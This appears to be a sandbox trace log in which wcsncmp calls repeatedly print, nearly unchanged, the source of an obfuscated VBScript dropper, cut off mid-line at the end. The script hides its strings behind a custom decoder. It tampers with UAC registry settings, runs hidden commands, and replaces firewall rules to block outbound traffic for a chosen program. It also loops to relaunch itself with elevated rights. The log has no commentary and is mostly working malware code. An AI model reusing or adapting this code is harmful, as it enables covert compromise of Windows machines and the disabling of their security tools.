bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.312] wcsncmp (_String1="1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0226.312] wcsncmp (_String1=" = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.312] wcsncmp (_String1="= Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0226.312] wcsncmp (_String1=" Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & 